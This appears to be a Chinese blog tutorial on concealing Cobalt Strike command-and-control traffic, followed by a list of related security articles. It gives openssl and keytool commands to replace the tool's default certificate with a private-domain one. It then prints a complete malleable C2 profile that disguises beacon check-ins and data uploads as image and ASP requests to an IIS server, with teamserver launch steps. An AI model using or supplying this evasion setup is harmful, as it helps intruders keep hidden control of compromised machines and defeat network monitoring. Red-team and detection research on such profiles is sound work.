CobaltStrike 流量隐藏

简介: CobaltStrike 流量隐藏

0x1 https流量隐藏

       前言:经过https加密后的流量虽然不是明文,但是cobaltstrike的默认证书有很多敏感文字,

               非常容易被识别。除此之外,使用默认的证书,流量也很容易被解密;

      解决:生成个人域名的证书;步骤如下:

       1. 去申请一个个人域名,推荐 https://www.namecheap.com/

       2.去给域名申请一个证书,下载证书压缩包;推荐

       3.上传证书压缩包到 cobaltstrike 目录,并解压;

       4.将证书转成 cobaltstrike.store 格式;

## 将公钥、私钥等转换格式
openssl pkcs12 -export -in {公钥文件} -inkey {私钥文件} -out {输出文件的命名} -name {证书对应的域名} -passout pass:{设置证书密码,需要记住}
openssl pkcs12 -export -in full_chain.pem -inkey private.key -out cdn.cseroadweb.xyz.p12 -name cdn.cseroadweb.xyz -passout pass:ccc123456
## 使用keytool生成 store 证书
keytool -importkeystore -deststorepass {上一步设置的密码} -destkeypass {上一步设置的密码} -destkeystore {输出文件的命名} -srckeystore {上一步输出的文件的路径} -srcstoretype PKCS12 -srcstorepass {上一步设置的密码} -alias {证书对应的域名}
keytool -importkeystore -deststorepass ccc123456 -destkeypass ccc123456 -destkeystore new.store -srckeystore cdn.cseroadweb.xyz.p12 -srcstoretype PKCS12 -srcstorepass ccc123456 -alias cdn.cseroadweb.xyz
## 生成store证书后,有1个warning,最好再对证书进行一个格式转换;new-2.store 是刚刚生成的store证书;
keytool -importkeystore -srckeystore new-2.store -destkeystore new-2.store -deststoretype pkcs12

       5.替换服务端与客户端通话的证书;

               修改teamserver,将 cobaltstrike.store 替换成我们生成的store证书;

       6.替换 web https 默认证书;

               6.1创建 profile文件,写下如下内容;

set sample_name "Etumbot";
set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)";
http-get {
    set uri "/image/";
    client {
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8";
        header "Referer" "http://www.google.com";
        header "Pragma" "no-cache";
        header "Cache-Control" "no-cache";
        metadata {
            netbios;
            append "-.jpg";
            uri-append;
        }
    }
    server {
        header "Content-Type" "img/jpg";
        header "Server" "Microsoft-IIS/6.0";
        header "X-Powered-By" "ASP.NET";
        output {
            base64;
            print;
        }
    }
}
http-post {
    set uri "/history/";
    client {
        header "Content-Type" "application/octet-stream";
        header "Referer" "http://www.google.com";
        header "Pragma" "no-cache";
        header "Cache-Control" "no-cache";
        id {
            netbiosu;
            append ".asp";
            uri-append;
        }
        output {
            base64;
            print;
        }
    }
    server {
        header "Content-Type" "img/jpg";
        header "Server" "Microsoft-IIS/6.0";
        header "X-Powered-By" "ASP.NET";
        output {
            base64;
            print;
        }
    }
}
https-certificate {
    set keystore "new.store";
    set password "Testaaa@1234";
}

                6.2 验证 profile 是否可用;

                        ./c2lint profile

       7. 启动cobaltstrike 服务端;设置profile 运行 teamserver;

               ./teamserver xx.xx.xx.xx passwd profile

       

       8.验证:访问cobaltstrike 服务端口、cobaltstrike listener 端口;查看证书,看到证书已经

           替换成我们的私人证书了;            

 

 

目录
相关文章
|
安全 网络安全
Metasploit Pro 4.20.0安装与使用
Metasploit Pro 4.20.0安装与使用
1142 0
Metasploit Pro 4.20.0安装与使用
|
弹性计算
阿里云服务器开放全部端口给所有IP使用教程
阿里云服务器端口全部开放教程,阿里云端口在安全组中设置,默认只开放22和3389端口,全部开放端口-1/-1,授权给所有IP地址0.0.0.0/0
11033 0
阿里云服务器开放全部端口给所有IP使用教程
|
存储 安全 API
阿里云先知安全沙龙(上海站) ——红队武器开发之基于合法服务的隐蔽C2
C2(命令与控制)是攻击者远程控制受感染主机的技术。通过合法服务平台(如Slack、Telegram等)的API,攻击者可以隐蔽地传输指令和数据,避免被传统检测机制发现。合法服务具备以下优势: 1. **隐蔽性强**:流量隐藏在正常通信中,难以被检测。 2. **开发成本低**:无需自行开发服务端,减少工作量。 3. **抗封禁能力**:合法域名/IP不易被封禁,威胁情报不会标黑。 4. **团队协作**:天然支持多成员协同作战。 示例包括SaaiwC组织利用Telegram和APT29组织利用Zulip平台进行数据传输和控制。
|
域名解析 缓存 负载均衡
CDN配置前置条件
CDN配置前置条件
487 1
|
安全 内存技术
【文件上传-配置文件】crossdomain.xml跨域策略配置文件上传
【文件上传-配置文件】crossdomain.xml跨域策略配置文件上传
|
安全 PHP 缓存
网站漏洞修复之Discuz X3.4远程代码执行漏洞
近期在对discuz x3.4进行全面的网站渗透测试的时候,发现discuz多国语言版存在远程代码执行漏洞,该漏洞可导致论坛被直接上传webshell,直接远程获取管理员权限,linux服务器可以直接执行系统命令,危害性较大,关于该discuz漏洞的详情,我们来详细的分析看下。
|
Web App开发 安全 .NET
FCKeditor上传漏洞总结
0x01 FCKeditor简介 FCKeditor是一个专门使用在网页上属于开放源代码的所见即所得文字编辑器。它志于轻量化,不需要太复杂的安装步骤即可使用。
3911 1
|
网络协议
MSSQL注入DNS带外问题解决
MSSQL注入DNS带外问题解决
501 2
|
JSON 监控 安全
通达OA任意文件上传漏洞详细分析
通达OA任意文件上传漏洞详细分析
|
XML 安全 C++
Windows RPC之MS-TSCH添加计划任务
Windows RPC之MS-TSCH添加计划任务
2038 0

热门文章

最新文章